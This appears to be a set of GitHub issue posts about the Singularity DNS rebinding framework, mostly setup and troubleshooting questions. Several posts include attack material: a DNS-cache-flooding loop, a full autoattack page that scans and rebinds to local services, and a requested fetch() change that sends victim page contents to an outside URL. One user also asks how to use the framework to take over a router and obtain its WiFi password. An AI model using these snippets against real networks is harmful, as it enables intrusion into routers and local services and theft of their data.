Hello,
in the paper "FireDrill: Interactive DNS Rebinding" the authors worked out than DNS Rebinding could be accelerated by flooding the DNS-cache of the browser. So instead of waiting for the pinned entries to expire, we can flood the cache with valid entries.
For example, the cache size of the chrome browser is about 1000 entries. Because of this I integrated the following loop in the payload.js file.

var i;
for(i=0; i < 1000; i++){
const url = "http://n"+i+".rebind.it";
fetch(url)
}

With this loop I could perform the "first then second" attack in ~5seconds. I successfully tested this with Chrome Browser, IP=127.0.0.1 and interval = 1s.

Hook and Control (hook-and-control.js): Hijack target browsers and use them to access inaccessible resources from your own browser or other HTTP clients. You can retrieve the list of hooked browsers on the "soohooked" sub-domain of the Singularity manager host on port 3129 by default e.g. http://soohooked.rebinder.your.domain:3129/. To authenticate, submit the secret value dumped to the console by the Singularity server at startup.

• When I copy and past the temporary secret it does not work. It says authentication failed

Good afternoon

I'm setting up Singularity to play around, but somehow none of the payloads work, I'm wondering if I'm missing something.

Here's my Namecheap setup:

This is the failed rebinding error with any of the payloads:

Server log:

Any tips are greatly appreciated! Thank you.

Cheers

Hi,

Thanks for the framework! I've just followed an installation instructions and noticed that $ cp ~/go/src/github.com/nccgroup/singularity/html/* ~/singularity/html/ produces and error cp: -r not specified; omitting directory ....

Please consider adding -r option to this command on wiki page :)

@gdncc Yo bro , would these weird IP formatting be useful in bypassing dns rebinding protection/filters ?

https://blog.dave.tf/post/ip-addr-parsing/

just like the CVE: 2020-26887

but more complicated.

I registered a domain with gandi and configured DNS as follows:

dynamic 1800 IN NS rebinder.MY_DOMAIN.COM
rebinder 1800 IN A MY_VPS_IP

And setup a VM instance with GCP with UDP and TCP appropiate firewall rules.

Problem is, if i use my own address (aka. dynamic.MY_DOMAIN.COM) as Attack Host Domain the attack fails because dynamic.MY_DOMAIN.COM cant be resolved. If i look at the traffic in wireshark i see server failure responses to dns queries to dynamic.MY_DOMAIN.COM.

If i set d.rebind.it as the Attack Host Domain everything works fine. Http Port scanner works flawlessly too.

I have tried with both Debian 9 and Ubuntu 18.04LTS instances.

I am running singularity-server with default DNS bind settings (0.0.0.0)

How can i solve this?

Hey there!

We are doing some research on DNS Rebinding and want to cite Singularity. Do you have paper on singularity to cite or we should cite your github ?

Thanks!

Everything works fine while started with this command sudo ./singularity-server --ResponseIPAddr 1.3.3.7 --HTTPServerPort 8080. However switching the port with --HTTPServerPort 80 doesn't work. I have 80 open in my vps .
It ain't possible to dns rebind on a port without starting singularity on that same port, is it?

The framework works great while using the rebinding strategy "First than second".
But if i try out the "Multiple answers" strategy there occus an error the following error 'iptables' finished with error: nil
As a result, no firewall rule is created and the requests are not blocked.
Can you give me a hint about what goes wrong?

There is an issue with some DNS providers for example Cloudflare.

Hook and Control requires add a wildcard (*) A record to yourdomain.com

so ANY.yourdomain.com will resolve to lets suppose 163.172.XX.XX
but *.dynamic.yourdomain.com will use the DNS server on 163.172.XX.XX and will switch between that IP and victim.

Here comes the conflict, when I add wildcard to cloudflare, and I do NSLOOKUP

Requests will return on duplicate with those rules.

The first request will return

C:\Users\Win>nslookup s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Addresses:  163.172.XX.XX
          163.172.XX.XX

The second

C:\Users\Win>nslookup s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    s-163.172.XX.XX-127.0.0.1-33782548737-ma-e.dynamic.yourdomain.com
Addresses:  163.172.XX.XX
          127.0.0.1

It follow both rules, the wildcard one, that resolves to 163.172.X and on the second request 10 seconds later to 127.0.0.1

on windows, it makes resolves always to 163.172.X.X

on linux, it doesn't resolves at all.

The possible solution:

Modify 1 or 2 lines in the source to route the sessionid to other subdomain

for example *.dynamic.yourdomain.com for rebinding

and *.tunnel.yourdomain.com

and we add a *.tunnel rule to forward the hostnames to the WS app.

Sadly I am not very familiar with this source and pretty new at golang

The partial solution that I made is remove that *, manually add soohocked A record, and when I want to tunnel to some session I manually add the record to /etc/hosts file.

I am pretty sure much of us uses cloudflare dns, standard domain provider DNS are not that flexible don't give free SSL certs and proxies etc.

Thanks for reading and hope it fixed on a further release.

I'm huge follower to you guys ,
Your Singularity DNS rebinding tool is such an amazing tool , i just tried to set it up on my own, but i terribly failed and get errors each step i do ,
The only thing that i wanted to do is making a "fetch" api request instead of showing "alert'" of the result ,exactly at https://github.com/nccgroup/singularity/blob/4744064e35cd6a3759630868d6a21597faf73234/html/manager.js in the line "574"

instead of making

alert('Target home page contents:\n' +msg.data.response);

just make it

fetch(url+msg.data.response); 

and add an html/js to manage the content receiver url ,
please if you don't mind made this change and apply it at http://rebind.it:8080/,

I tried to host it on my own and as i previously said by i faced alot of errors ,
I don't want to disrespect you (i'm not meaning that at all) , but i'd help with money if it's required .

And thanks for time and your great research & services
Please do not ignore

https://www.redteam-pentesting.de/en/advisories/rt-sa-2020-003/-fritz-box-dns-rebinding-protection-bypass

hallo dear..

i have problem ...and i added the dot but its not secces..
and thats hpend when local target or public >>im the local aand public ...
root@kali:~/singularity# ./singularity-server --HTTPServerPort 80 --ResponseIPAddr 192.168.1.5 --ResponseReboundIPAddr 192.168.1.6
Temporary secret: d4c7b6ea906748c73d054dab7de931b304250dda
2020/01/05 23:50:12 Main: Starting DNS Server at 53
2020/01/05 23:50:12 HTTP: starting HTTP Server on :80
2020/01/05 23:50:12 HTTP: starting HTTP Websockets/Proxy Server on :3129
2020/01/05 23:50:39 HTTP: GET / from [::1]:52888
2020/01/05 23:50:41 HTTP: GET /manager.html from [::1]:52890
2020/01/05 23:50:41 HTTP: GET /manager.js from [::1]:52892
2020/01/05 23:50:41 HTTP: GET /servers from [::1]:52894
{"ServerInformation":[{"Port":"80"}],"AllowDynamicHTTPServers":false}
2020/01/05 23:50:41 HTTP: GET /manager-config.json from [::1]:52896

Instead of abusing the TTL on DNS entries. Why not have two IPs for one A record?

The way that browser works is if the first A recorded fails to connect the application will fall back to the next IP. This in theory would allow you to instantly do DNS rebinding without having to worry about and silly browse caching.

Hello,

I have setup DNS domain (called MYDOMAIN.COM) on Gandi.net and Singularity server in Azure (Redhat 8.1) called SINGULATITY_SERVER_IP.
I have added required entries to Gandi.net DNS and opened UDP 53 and TCP 80 port on Singulatiry serwer.
In my local network, I have printer which provides Web page for management available in my local network under IP address 192.168.1.48.
I am able to access printer web page without authentication from my laptop (in the same local network). Curl command also gets the results when I query printer web page from laptop.
I have made tests with connection to Singulatiry server and all seems to be ok.
Unfortunately none of payloads work :(
I am running them on my Laptop on MacOS and I have tried also on WIndows VM.
From the Singularity server I am receiving these logs when using "Simple Fetch Get" payload and "First and second" strategy.

It should work, but it does't. Where might be a problem?
Thank you for any help

Let's say that the pass and username are admin.admin
How will the DNS rebinding connect to the router page and enable the remote access .. Send us the WiFi password ..etc
Is There a video- tutorial that a one can follow ?!

Hello.

A student contacted me requesting help setting up a singularity server. I span up a debian 10 vm to try this out before we meet tonight.

After installing go and after installing the specified packages, there is no folder to cd into as suggested by the setup instructions.

   go get -v github.com/nccgroup/singularity
   go get -v github.com/gorilla/mux
   go get -v github.com/gorilla/websocket
   go get -v github.com/gorilla/securecookie
   cd ~/go/src/github.com/nccgroup/singularity/cmd/singularity-server
   -bash: cd: /root/go/src/github.com/nccgroup/singularity/cmd/singularity-server: No such file or directory

This tool seems interesting, but I am unable to proceed with the installation past this point and won't be able to assist my student further as a result. I've informed them to inform their professor that the instructions might be out-of-date (as it appears).

Were someone to want to proceed forward on a new box, how might we go about doing this?

There is a bug on the origin definition on FrameManager on manager.js.

    const origin = (url) => {
        //Does not work in IE11. 
        //const u = new URL(url); 
        // Workaround:
        let u = document.createElement('a');
        let id = Math.random().toString();
        u.setAttribute('href', url);
        u.setAttribute('id', id);
        const o = `${u.protocol}//${u.hostname}:${u.port}`; // <---- HERE
        u.remove();
        return o;
    };

u.port would be empty if the port is 80 (because browsers remove it from a url when using 80). That would cause the origin to be "example.com:" instead of "example.com"

Change that line for:

const o = u.port ? `${u.protocol}//${u.hostname}:${u.port}`: `${u.protocol}//${u.hostname}`;

By the way, great tool, thank you!

I set up the dynamic.mydomain.com as nameserver for my domain.

I also set rebinder.mydomain.com as well as *.mydomain.com as A records.

Ran,

But I still can't reach rebinder.mydomain.com:8080/manager.html

What could be causing this issue?

https://sinister.ly/Thread-DNS-Rebinding-Attack

i would really like to read your response .
Thanks
wish you a good day :)

Hi,
I've followed all the instructions from the wiki, and I managed to get the server running.
Now, the issue I've been facing is that issuing host to d.mydomain.tk keeps getting me my ip address instead of expected my ip address and 127.0.0.1 , and testing your demo version I see that this(my example):
s-my.ip.add.ress-127.0.0.1-158903359-ma-e.d.mydomain.tk should resolve to both my ip address and 127.0.0.1 in different order with each request as in rebinding in action, but instead
Host s-my.ip.add.ress-127.0.0.1-158903359-ma-e.d.mydomain.tk not found: 2(SERVFAIL)

I am using digitalocean vps so I was wondering if that may be the cause.

My setup is as follows (note that for NS rebinder.mydomain.tk can't be saved with the ending . for some reason, and I have been messing around with TTL values to see if that would help somehow):

A | *.mydomain.tk | directs to 206.189.179.65 | 30 TTL
A | rebinder.mydomain.tk | directs to 206.189.179.65 | 30 TTL
NS | dynamic.mydomain.tk | directs to rebinder.mydomain.tk | 60 TTL
NS | mydomain.tk | directs to ns1.digitalocean.com. 1800 TTL
NS | mydomain.tk | directs to ns2.digitalocean.com. 1800 TTL
NS | mydomain.tk | directs to ns3.digitalocean.com. 1800 TTL

The other issue is that issuing:
host dynamic.mydomain.tk
also fails
but issuing:
host rebinder.mydomain.tk
my.ip.add.ress

And I have tried this as well in order to verify if it's working as it's supposed to (from https://github.com/nccgroup/singularity/wiki/Setup-and-Installation#on-the-dns-registrar-web-management-interface):
This sample setup informs DNS clients, including browsers, that "ip.ad.dr.ss" answers queries for any subdomains under ".dynamic.your.domain.", e.g. "foo.dynamic.your.domain."

but it fails.

I have also had trouble figuring out this(from https://github.com/nccgroup/singularity/wiki/Setup-and-Installation#on-the-dns-registrar-web-management-interface):
A Name: "rebinder", IPv4: "ip.ad.dr.ss". -- ok, this makes sense, it's very straightforward.
NS Name: "dynamic", Hostname: "rebinder.your.domain.". Note that the ending dot "." in the hostname is required. -- this one is confusing when looked at the:
https://cloud.digitalocean.com/networking/domains/mydomain.tk

where there is NS area, but it looks like this:
Field 1 asks for @ (which simply leaves the value mydomain.tk) or to specify hostname (which expects one word and then it saves it as oneword.mydomain.tk) and the second field is Directs to which expects my.ip.add.ress or a complete hostname (ie rebinder.mydomain.tk.) and for some hostnames/ip addresses it saves with . at the end automatically and for others it removes the added dot (.)

So, I've been trying to direct things all over the place to get it working but the most I got was everything resolving to only my.ip.add.ress instead of going between my.ip.add.ress and 127.0.0.1 as it's supposed to.

This is a lot to ask, but I've tried other rebinding frameworks that flat out don't work and they don't require any dns configuration so I have no idea what to do with those or what questions to ask, so I'd appreciate any pointer in the right direction for dns configuring that pertains to dns rebinding, googling anything about dns rebinding tends to show theory or tools without links to tools, or tools don't work but sound great with regards to not requiring any setup other than editing a js or html file.

Thanks for the effort in making this framework and hopefully my question has a simple and quick answer :)

Sincerely,
@musashi42

Hi,

I tried to test my simple python app on port 8080 on localhost.
I own a domain and subdomain for this attack.
When I try to load the URL http://rebind.mydomain/autoattack.html, the rebind DNS is working but the simple payload try to fetch my simple python service with GET /soopayload.html which leads to 404...
I set up my config following this video :
https://www.youtube.com/watch?v=R5Y1luRhjbc

<!doctype html>
<html lang="en">
<head>
    <title>Singularity of Origin DNS Rebinding Automatic Attack</title>
    <script src="manager.js"></script>
    <script src=scan-manager.js></script>
    <meta charset="utf-8">
    <meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
    The home page of vulnerable services will be dumped in the browser developer console.
    <script>
        const configuration = {
            attackHostIPAddress: 'X.X.X.X', //my singularity web server 
            attackHostDomain: 'dynamic.mydomain', //which is NS entry 
            rebindingStrategy: 'ma',
            attackPayload: 'Simple Fetch Get',
            interval: "1",
            flushDns: false,
            indexToken: "<!--thisismytesttoken-->",
            wsProxyPort: 3129,
            hideActivity: false,
            delayDOMLoad: false,
        };
        configuration.rebindingSuccessFn = (msg) => {
            console.log(`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`);
        }
        app.getConfiguration().setManually(configuration);
        let addrSpec = `0.0.0.0`; // this is a Linux Host
        let searchForMoreAddresses = false;
        const portSpec = '8080'; // python simple server port
        function scanFoundNewTargetCb(result) {
            console.log(result);
            document.getElementById("activity").innerHTML += JSON.stringify(result, null, 4) + "<br/>";
            app.attackTarget(result.target.address.replace("-", "--"), result.target.port, true);
        }
        function scanDoneCb(results) {
            document.getElementById("activity").innerHTML += "Done.<br/>";
            setTimeout(function () {
                sm.shutDown();
            }, 3000);
            setTimeout(function () {
                delaydomloadframe.src = "about:blank";
            }, 90000);
        }
        async function getLocalIpAddressesThenScan() {
            sm = ScanManager();
            const externalAddress = await getMyExternalIpAddress();
            addrSpec = `${addrSpec},${externalAddress}`;
            getLocalIpAddress()
                .then(address => {
                    const range = `${address.split('.', 3).join('.')}.1-254`;
                    sm.run(`${addrSpec},${range}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                },
                    e => {
                        console.log(e);
                        sm.run(`${addrSpec},192.168.1.1-254`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                    })
        }
        if (searchForMoreAddresses === true) {
            getLocalIpAddressesThenScan();
        } else {
            sm = ScanManager();
            sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
        }
    </script>
    <h3>Scanning Progress</h3>
    <div id="activity"></div>
    <h3>DNS Rebinding Progress</h3>
    <div id=attackframes></div>
    <iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>

And this is the output of my python server :

127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -

Hi there,

I'm running into an error when attempting to compile singularity-server

Steps Taken

1. go get -v github.com/nccgroup/singularity
2. cd ~/go/src/github.com/nccgroup/singularity/cmd/singularity-server
3. go build

Output:

# github.com/nccgroup/singularity
../../singularity.go:797:20: undefined: net.ListenConfig

I'm on a fresh Ubuntu 18.04.4 VPS with Golang 1.10.4 installed. Any tips would be greatly appreciated!

OS: Ubuntu 20.04.1 LTS

I used the default version (79.0) of Firefox at first, and then I tried to upgrade Firefox to the latest version (95.0.1), but it failed.

It seems that the local service is directly accessed, and it is a 404 directly.

I tried 127.0.0.1 again and it failed

After overcoming the previous issue and getting Singularity successfully installed, I've run into another problem in the setup instructions, this time with the DNS registration itself.

I have not checked ghandi, but namecheap, at least, does not allow me to register an A record with host name of type "rebinder.myhost.com." (with the ending period). It states that it is an invalid host name.

I've messaged namecheap about this limitation and am waiting to hear back about it. I assume they disabled it for security reasons. Is there a reason that the ending period is required? I'm sure there is, but since they do not allow me to set that up, perhaps I could know more behind why it is required while I wait for them to explain why they disabled that to begin with?

Currently, singularity has to be configured with ports at startup or be configured to dynamically bind to ports with the "dangerously allow request ports" option.

If you have a dedicated IP address for singularity on the machine, it may be possible to use the tproxy module in linux along with SO_TRANSPARENT socket option to redirect incoming connections on all ports for that IP to singularity.

Cloudflare has a great blog post on how to accomplish this.

Alternatively, if Singularity supported the PROXY protocol, users could set up this trick and forward traffic to Singularity with the original/port available in headers sent to the application

Hi.

Files:

It's okay. The router / gateway HTTP server has iframes protection enabled.

But why can't I connect via AJAX connection?

I have inserted in the code of the file manager.html jQuery and the function get()

However:

What is the problem?

Thank you!

Hi @gdncc and congratulations on the tool you made. I am trying to perform the attack on my home router and I cannot understand why it is giving me this error.

I tried another router on a different line and the attack was successful.

Could you help me understand why it doesn't work on this router? or what caused the error.

Sorry for my English.

When I try to build the main.go file it shows up with code error and fails to compile. Tried it on two windows machines with different go versions.

Both failed

Thanks for the amazing tool and research!
I have a strange website vulnerable to Blind SSRF and I see the application is using HeadlessChrome to make the requests and the backend is hosted on GCP.
Doing some simple tests I noticed the application seems to filter or block iframes when HeadlessChrome is loading the response.
I'd like to know if it's possible to have a minimal payload without iframes with a minimum javascript code.

Regards
Ricardo Iramar

Is Singularity supports sending the traffic via SSL encryption? In that case. How to install the Letsencrypt certificate and enable https?

Or any other alternative

Hello:

In this link: https://github.com/nccgroup/singularity/wiki/Setup-and-Installation. You indicate that gandi or namecheap is used. And a Linux instance of some of these: Linode, Amazon AWS, Google Cloud, Microsoft Azure etc.

I understand that you have tried any of these combinations.

In my case I have tried with gandi and with Google Cloud and Azure. But I cannot connect an external machine with the instance through the DNS protocol (53).

I have an Ubuntu 18 installed on the MV. And I have disabled the systemd-resolved service as indicated in the documentation.

He permitido la entrada de todos los protocolos. Pero no puedo conectarme a través del puerto 53 UDP.

The connection is established through: nc local_ip 53 -u. It is as if the Azure / google Cloud firewall filters or uses port 53.

Any idea how to fix this? You've done it?

My /etc/resolv.conf file:

nameserver 8.8.8.8
options edns0
search europe-west4-b.c.handy-zephyr-275214.internal c.handy-zephyr-275214.internal google.internal

I understand that the domain server can only communicate with the instance through port 53, which I cannot change. Do NAT type 5353 -> 53

Regarding the domain configuration, you would only have to modify this, is that so?

For this:

@ 10800 IN SOA ns1.gandi.net. hostmaster.gandi.net. 1554761168 10800 3600 604800 10800
@ 3600 IN A VM_IP
d 1800 IN NS nettinghack.site.
* 1800 IN A VM_IP

Thanks a lot!